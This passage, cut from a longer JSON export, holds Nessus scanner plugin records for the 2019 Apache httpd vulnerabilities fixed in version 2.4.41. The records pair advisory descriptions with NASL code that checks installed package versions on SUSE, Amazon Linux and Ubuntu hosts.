reference:\"apache2-prefork-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-prefork-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-utils-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-utils-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-worker-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-worker-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-debugsource-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-devel-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-event-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-event-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-example-pages-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-prefork-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-prefork-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-utils-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-utils-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-worker-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-worker-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"apache2-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"apache2-debugsource-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"apache2-event-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"apache2-event-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"apache2-example-pages-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"apache2-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"apache2-debugsource-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"apache2-event-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"apache2-event-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"apache2-example-pages-2.4.33-3.21.1\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-01T16:35:03", "description": "According to its banner, the version of Apache running on the remote host is 2.4.x prior to 2.4.41. It is, therefore, affected by multiple vulnerabilities:\n\n - A cross-site scripting (XSS) vulnerability exists in mod_proxy when proxying is enabled and Proxy Error page is displayed. (CVE-2019-10092)\n\n - An open redirect vulnerability exists in mod_rewrite when using self-referential redirects. (CVE-2019-10098)\n\n - A read-after-free vulnerability exists in mod_http2 during connection shutdown. (CVE-2019-10082)\n\n - A memory corruption vulnerability exists in mod_http2 on early pushes. (CVE-2019-10081)\n\n - A denial of service (DoS) vulnerability exists in mod_http2 by exhausting h2 workers. (CVE-2019-9517)\n\n - A stack buffer overflow and NULL pointer dereference vulnerabilities exist in mod_remoteip when using a specially crafted PROXY header. (CVE-2019-10097)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-08-20T00:00:00", "type": "nessus", "title": "Apache 2.4.x < 2.4.41 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98669", "href": "https://www.tenable.com/plugins/was/98669", "sourceData": "No source data", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-01T16:44:07", "description": "A vulnerability was found in Apache httpd, in mod_http2. Under certain circumstances, HTTP/2 early pushes could lead to memory corruption, causing a server to crash.(CVE-2019-10081)\n\nA read-after-free vulnerability was discovered in Apache httpd, in mod_http2. A specially crafted http/2 client session could cause the server to read memory that was previously freed during connection shutdown, potentially leading to a crash.(CVE-2019-10082)\n\nA cross-site scripting vulnerability was found in Apache httpd, affecting the mod_proxy error page. Under certain circumstances, a crafted link could inject content into the HTML displayed in the error page, potentially leading to client-side exploitation.(CVE-2019-10092)\n\nA vulnerability was discovered in Apache httpd, in mod_remoteip. A trusted proxy using the 'PROXY' protocol could send specially crafted headers that can cause httpd to experience a stack buffer overflow or NULL pointer dereference, leading to a crash or other potential consequences.\\n\\nThis issue could only be exploited by configured trusted intermediate proxy servers. HTTP clients such as browsers could not exploit the vulnerability.(CVE-2019-10097)\n\nA vulnerability was discovered in Apache httpd, in mod_rewrite.\nCertain self-referential mod_rewrite rules could be fooled by encoded newlines, causing them to redirect to an unexpected location. An attacker could abuse this flaw in a phishing attack or as part of a client-side attack on browsers.(CVE-2019-10098)\n\nSome HTTP/2 implementations are vulnerable to unconstrained interal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint; however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire. The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both.(CVE-2019-9517)", "cvss3": {}, "published": "2019-10-28T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : httpd24 (ALAS-2019-1311) (Internal Data Buffering)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd24", "p-cpe:/a:amazon:linux:httpd24-debuginfo", "p-cpe:/a:amazon:linux:httpd24-devel", "p-cpe:/a:amazon:linux:httpd24-manual", "p-cpe:/a:amazon:linux:httpd24-tools", "p-cpe:/a:amazon:linux:mod24_ldap", "p-cpe:/a:amazon:linux:mod24_md", "p-cpe:/a:amazon:linux:mod24_proxy_html", "p-cpe:/a:amazon:linux:mod24_session", "p-cpe:/a:amazon:linux:mod24_ssl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2019-1311.NASL", "href": "https://www.tenable.com/plugins/nessus/130281", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2019-1311.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130281);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10081\", \"CVE-2019-10082\", \"CVE-2019-10092\", \"CVE-2019-10097\", \"CVE-2019-10098\", \"CVE-2019-9517\");\n script_xref(name:\"ALAS\", value:\"2019-1311\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Amazon Linux AMI : httpd24 (ALAS-2019-1311) (Internal Data Buffering)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A vulnerability was found in Apache httpd, in mod_http2. Under certain\ncircumstances, HTTP/2 early pushes could lead to memory corruption,\ncausing a server to crash.(CVE-2019-10081)\n\nA read-after-free vulnerability was discovered in Apache httpd, in\nmod_http2. A specially crafted http/2 client session could cause the\nserver to read memory that was previously freed during connection\nshutdown, potentially leading to a crash.(CVE-2019-10082)\n\nA cross-site scripting vulnerability was found in Apache httpd,\naffecting the mod_proxy error page. Under certain circumstances, a\ncrafted link could inject content into the HTML displayed in the error\npage, potentially leading to client-side exploitation.(CVE-2019-10092)\n\nA vulnerability was discovered in Apache httpd, in mod_remoteip. A\ntrusted proxy using the 'PROXY' protocol could send specially crafted\nheaders that can cause httpd to experience a stack buffer overflow or\nNULL pointer dereference, leading to a crash or other potential\nconsequences.\\n\\nThis issue could only be exploited by configured\ntrusted intermediate proxy servers. HTTP clients such as browsers\ncould not exploit the vulnerability.(CVE-2019-10097)\n\nA vulnerability was discovered in Apache httpd, in mod_rewrite.\nCertain self-referential mod_rewrite rules could be fooled by encoded\nnewlines, causing them to redirect to an unexpected location. An\nattacker could abuse this flaw in a phishing attack or as part of a\nclient-side attack on browsers.(CVE-2019-10098)\n\nSome HTTP/2 implementations are vulnerable to unconstrained interal\ndata buffering, potentially leading to a denial of service. The\nattacker opens the HTTP/2 window so the peer can send without\nconstraint; however, they leave the TCP window closed so the peer\ncannot actually write (many of) the bytes on the wire. The attacker\nthen sends a stream of requests for a large response object. Depending\non how the servers queue the responses, this can consume excess\nmemory, CPU, or both.(CVE-2019-9517)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2019-1311.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update httpd24' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_md\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-2.4.41-1.88.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-debuginfo-2.4.41-1.88.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-devel-2.4.41-1.88.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-manual-2.4.41-1.88.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-tools-2.4.41-1.88.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ldap-2.4.41-1.88.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_md-2.4.41-1.88.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_proxy_html-2.4.41-1.88.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_session-2.4.41-1.88.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ssl-2.4.41-1.88.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd24 / httpd24-debuginfo / httpd24-devel / httpd24-manual / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-04T14:50:08", "description": "The version of Apache httpd installed on the remote host is prior to 2.4.41. It is, therefore, affected by multiple vulnerabilities as referenced in the 2.4.41 advisory, including the following:\n\n - A limited cross-site scripting issue was reported affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed. (CVE-2019-10092)\n\n - HTTP/2 (2.4.20 through 2.4.39) very early pushes, for example configured with H2PushResource, could lead to an overwrite of memory in the pushing request's pool, leading to crashes. The memory copied is that of the configured push link header values, not data supplied by the client. (CVE-2019-10081)\n\n - Some HTTP/2 implementations are vulnerable to unconstrained internal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint;\n however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire. The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both. (CVE-2019-9517)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-08-20T00:00:00", "type": "nessus", "title": "Apache 2.4.x < 2.4.41 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:apache:httpd", "cpe:/a:apache:http_server"], "id": "APACHE_2_4_41.NASL", "href": "https://www.tenable.com/plugins/nessus/128033", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128033);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2019-9517\",\n \"CVE-2019-10081\",\n \"CVE-2019-10082\",\n \"CVE-2019-10092\",\n \"CVE-2019-10097\",\n \"CVE-2019-10098\"\n );\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Apache 2.4.x < 2.4.41 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache httpd installed on the remote host is prior to 2.4.41. It is, therefore, affected by multiple\nvulnerabilities as referenced in the 2.4.41 advisory, including the following:\n\n - A limited cross-site scripting issue was reported affecting the mod_proxy error page. An attacker could\n cause the link on the error page to be malformed and instead point to a page of their choice. This would\n only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way\n that the Proxy Error page was displayed. (CVE-2019-10092)\n\n - HTTP/2 (2.4.20 through 2.4.39) very early pushes, for example configured with H2PushResource, could lead\n to an overwrite of memory in the pushing request's pool, leading to crashes. The memory copied is that\n of the configured push link header values, not data supplied by the client. (CVE-2019-10081)\n\n - Some HTTP/2 implementations are vulnerable to unconstrained internal data buffering, potentially leading\n to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint;\n however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the\n wire. The attacker then sends a stream of requests for a large response object. Depending on how the\n servers queue the responses, this can consume excess memory, CPU, or both. (CVE-2019-9517)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.41 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nvar constraints = [\n { 'min_version' : '2.4.0', 'fixed_version' : '2.4.41', 'modules':['mod_proxy', 'mod_http2', 'mod_remoteip', 'mod_rewrite'] }\n];\n\nvcf::apache_http_server::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-01T16:36:38", "description": "Stefan Eissing discovered that the HTTP/2 implementation in Apache did not properly handle upgrade requests from HTTP/1.1 to HTTP/2 in some situations. A remote attacker could use this to cause a denial of service (daemon crash). This issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04. (CVE-2019-0197)\n\nCraig Young discovered that a memory overwrite error existed in Apache when performing HTTP/2 very early pushes in some situations. A remote attacker could use this to cause a denial of service (daemon crash).\nThis issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04.\n(CVE-2019-10081)\n\nCraig Young discovered that a read-after-free error existed in the HTTP/2 implementation in Apache during connection shutdown. A remote attacker could use this to possibly cause a denial of service (daemon crash) or possibly expose sensitive information. This issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04. (CVE-2019-10082)\n\nMatei Badanoiu discovered that the mod_proxy component of Apache did not properly filter URLs when reporting errors in some configurations.\nA remote attacker could possibly use this issue to conduct cross-site scripting (XSS) attacks. (CVE-2019-10092)\n\nDaniel McCarney discovered that mod_remoteip component of Apache contained a stack buffer overflow when parsing headers from a trusted intermediary proxy in some situations. A remote attacker controlling a trusted proxy could use this to cause a denial of service or possibly execute arbitrary code. This issue only affected Ubuntu 19.04.\n(CVE-2019-10097)\n\nYukitsugu Sasaki discovered that the mod_rewrite component in Apache was vulnerable to open redirects in some situations. A remote attacker could use this to possibly expose sensitive information or bypass intended restrictions. (CVE-2019-10098)\n\nJonathan Looney discovered that the HTTP/2 implementation in Apache did not properly limit the amount of buffering for client connections in some situations. A remote attacker could use this to cause a denial of service (unresponsive daemon). This issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04. (CVE-2019-9517).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-08-30T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS / 19.04 : Apache HTTP Server vulnerabilities (USN-4113-1) (Internal Data Buffering)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0197", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2023-05-11T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:apache2", "p-cpe:/a:canonical:ubuntu_linux:apache2-bin", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:19.04"], "id": "UBUNTU_USN-4113-1.NASL", "href": "https://www.tenable.com/plugins/nessus/128412", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4113-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128412);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/11\");\n\n script_cve_id(\"CVE-2019-0197\", \"CVE-2019-10081\", \"CVE-2019-10082\", \"CVE-2019-10092\", \"CVE-2019-10097\", \"CVE-2019-10098\", \"CVE-2019-9517\");\n script_xref(name:\"USN\", value:\"4113-1\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0203\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS / 19.04 : Apache HTTP Server vulnerabilities (USN-4113-1) (Internal Data Buffering)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Stefan Eissing discovered that the HTTP/2 implementation in Apache did\nnot properly handle upgrade requests from HTTP/1.1 to HTTP/2 in some\nsituations. A remote attacker could use this to cause a denial of\nservice (daemon crash). This issue only affected Ubuntu 18.04 LTS and\nUbuntu 19.04. (CVE-2019-0197)\n\nCraig Young discovered that a memory overwrite error existed in Apache\nwhen performing HTTP/2 very early pushes in some situations. A remote\nattacker could use this to cause a denial of service (daemon crash).\nThis issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04.\n(CVE-2019-10081)\n\nCraig Young discovered that a read-after-free error existed in the\nHTTP/2 implementation in Apache during connection shutdown. A remote\nattacker could use this to possibly cause a denial of service (daemon\ncrash) or possibly expose sensitive information. This issue only\naffected Ubuntu 18.04 LTS and Ubuntu 19.04. (CVE-2019-10082)\n\nMatei Badanoiu discovered that the mod_proxy component of Apache did\nnot properly filter URLs when reporting errors in some configurations.\nA remote attacker could possibly use this issue to conduct cross-site\nscripting (XSS) attacks. (CVE-2019-10092)\n\nDaniel McCarney discovered that mod_remoteip component of Apache\ncontained a stack buffer overflow when parsing headers from a trusted\nintermediary proxy in some situations. A remote attacker controlling a\ntrusted proxy could use this to cause a denial of service or possibly\nexecute arbitrary code. This issue only affected Ubuntu 19.04.\n(CVE-2019-10097)\n\nYukitsugu Sasaki discovered that the mod_rewrite component in Apache\nwas vulnerable to open redirects in some situations. A remote attacker\ncould use this to possibly expose sensitive information or bypass\nintended restrictions. (CVE-2019-10098)\n\nJonathan Looney discovered that the HTTP/2 implementation in Apache\ndid not properly limit the amount of buffering for client connections\nin some situations. A remote attacker could use this to cause a denial\nof service (unresponsive daemon). This issue only affected Ubuntu\n18.04 LTS and Ubuntu 19.04. (CVE-2019-9517).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4113-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected apache2 and / or apache2-bin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:19.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2023 Canonical, Inc. / NASL script (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04|19\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04 / 19.04\", \"Ubuntu \" + release);\nif ( ! 